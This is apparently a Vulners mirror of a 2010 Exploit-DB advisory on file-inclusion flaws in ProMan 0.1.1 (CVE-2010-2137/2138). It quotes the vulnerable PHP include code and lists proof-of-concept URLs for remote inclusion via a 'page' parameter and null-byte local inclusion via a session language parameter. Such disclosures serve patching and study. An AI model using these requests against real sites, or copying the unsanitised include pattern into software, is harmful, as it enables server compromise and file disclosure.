Lucene search
+L

ProMan 0.1.1 - Multiple File Inclusions

🗓️ 27 Feb 2010 00:00:00Reported by cr4wl3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

ProMan 0.1.1 Multiple File Include Vulnerability. PHP code allows inclusion of arbitrary files. Exploitable through Remote File Inclusion (RFI) and Local File Inclusion (LFI

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2137
27 Feb 201000:00
circl
circl
Circl
CVE-2010-2138
27 Feb 201000:00
circl
cve
CVE
CVE-2010-2137
2 Jun 201018:14
cve
cve
CVE
CVE-2010-2138
2 Jun 201018:14
cve
cvelist
Cvelist
CVE-2010-2137
2 Jun 201018:14
cvelist
cvelist
Cvelist
CVE-2010-2138
2 Jun 201018:14
cvelist
euvd
EUVD
EUVD-2010-2153
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2010-2154
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-2137
2 Jun 201018:30
nvd
nvd
NVD
CVE-2010-2138
2 Jun 201018:30
nvd
Rows per page
##############################################################
##ProMan  <= 0.1.1 Multiple File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/pman/files/
##############################################################
[RFI Code]

<?php
                    if (!($_GET['page']))
                    	include('info.php');
                    else
                        include $_GET['page'].'.php';
                ?>

[LFI Code]

include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');
if (!defined('PROMAN'))
 	pexit ($l['no hack']);
##############################################################
PoC RFI:
 [phpRAINCHECK_path]/_center.php?page=[Shell]
##############################################################
PoC LFI:
 [phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00]
 [phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00]

others...
##############################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Feb 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.05882
31